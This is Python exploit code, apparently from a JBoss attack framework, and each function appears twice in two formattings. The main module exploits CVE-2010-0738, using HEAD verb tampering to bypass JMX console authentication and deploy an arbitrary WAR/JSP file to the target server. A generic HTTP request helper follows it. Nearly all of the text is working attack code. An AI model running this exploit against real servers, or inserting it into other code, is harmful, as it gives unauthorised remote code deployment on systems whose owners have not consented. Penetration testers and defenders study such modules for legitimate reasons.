def run(fingerengine, fingerprint):
""" This module exploits CVE-2010-0738, which bypasses authentication
by submitting requests with different HTTP verbs, such as HEAD.
"""
utility.Msg("Checking %s for verb tampering" % fingerengine.options.ip,
LOG.DEBUG)
url = "http://{0}:{1}/jmx-console/HtmlAdaptor".format(
fingerengine.options.ip, fingerprint.port)
response = utility.requests_head(url)
if response.status_code == 200:
utility.Msg(
"Vulnerable to verb tampering, attempting to deploy...",
LOG.SUCCESS)
war_file = abspath(fingerengine.options.deploy)
war_name = parse_war_path(war_file)
tamper = "/jmx-console/HtmlAdaptor?action=invokeOp"\
"&name=jboss.admin:service=DeploymentFileRepository&methodIndex=5"\
"&arg0={0}&arg1={1}&arg2=.jsp&arg3={2}&arg4=True".format(
war_file.replace('.jsp', '.war'), war_name,
quote_plus(open(war_file).read()))
response = utility.requests_head(url + tamper)
if response.status_code == 200:
utility.Msg("Successfully deployed {0}".format(war_file),
LOG.SUCCESS)
else:
utility.Msg(
"Failed to deploy (HTTP %d)" % response.status_code,
LOG.ERROR)
def run(fingerengine, fingerprint):
""" This module exploits CVE-2010-0738, which bypasses authentication
by submitting requests with different HTTP verbs, such as HEAD.
"""
utility.Msg("Checking %s for verb tampering" % fingerengine.options.ip,
LOG.DEBUG)
url = "http://{0}:{1}/jmx-console/HtmlAdaptor".format(fingerengine.options.ip,
fingerprint.port)
response = utility.requests_head(url)
if response.status_code == 200:
utility.Msg("Vulnerable to verb tampering, attempting to deploy...", LOG.SUCCESS)
war_file = abspath(fingerengine.options.deploy)
war_name = parse_war_path(war_file)
tamper = "/jmx-console/HtmlAdaptor?action=invokeOp"\
"&name=jboss.admin:service=DeploymentFileRepository&methodIndex=5"\
"&arg0={0}&arg1={1}&arg2=.jsp&arg3={2}&arg4=True".format(
war_file.replace('.jsp', '.war'), war_name,
quote_plus(open(war_file).read()))
response = utility.requests_head(url + tamper)
if response.status_code == 200:
utility.Msg("Successfully deployed {0}".format(war_file), LOG.SUCCESS)
else:
utility.Msg("Failed to deploy (HTTP %d)" % response.status_code, LOG.ERROR)
def make_request(method,host,port,ssl,url,data,cookies=None,allow_redirects=True):
response = None
if port == None and ssl:
port = 443
if port == None and not ssl:
port = 80
try:
url = "{0}://{1}:{2}{3}".format("https" if ssl else "http",
host, port,url)
if method == 'GET':
response = utility.requests_get(url,cookies=cookies)
elif method == 'BASIC':
response = utility.requests_get(url,cookies=cookies,auth=(data['username'],data['password']))
elif method == 'POST':
response = utility.requests_post(url,data,cookies=cookies,allow_redirects=allow_redirects)
elif method == 'HEAD':
response = utility.requests_head(url,cookies=cookies)
elif method == 'PUT':
response = utility.requests_put(url,data,cookies=cookies)
else:
response = utility.requests_other(method,url,cookies=cookies)
return response
except exceptions.Timeout:
utility.Msg("Timeout to {0}:{1}".format(host,port), 'DEBUG')
except exceptions.ConnectionError, e:
utility.Msg("Connection error to {0} ({1})".format(host,port, e),'DEBUG')
def make_request(method,
host,
port,
ssl,
url,
data,
cookies=None,
allow_redirects=True):
response = None
if port == None and ssl:
port = 443
if port == None and not ssl:
port = 80
try:
url = "{0}://{1}:{2}{3}".format("https" if ssl else "http", host, port,
url)
if method == 'GET':
response = utility.requests_get(url, cookies=cookies)
elif method == 'BASIC':
response = utility.requests_get(url,
cookies=cookies,
auth=(data['username'],
data['password']))
elif method == 'POST':
response = utility.requests_post(url,
data,
cookies=cookies,
allow_redirects=allow_redirects)
elif method == 'HEAD':
response = utility.requests_head(url, cookies=cookies)
elif method == 'PUT':
response = utility.requests_put(url, data, cookies=cookies)
else:
response = utility.requests_other(method, url, cookies=cookies)
return response
except exceptions.Timeout:
utility.Msg("Timeout to {0}:{1}".format(host, port), 'DEBUG')
except exceptions.ConnectionError, e:
utility.Msg("Connection error to {0} ({1})".format(host, port, e),
'DEBUG')
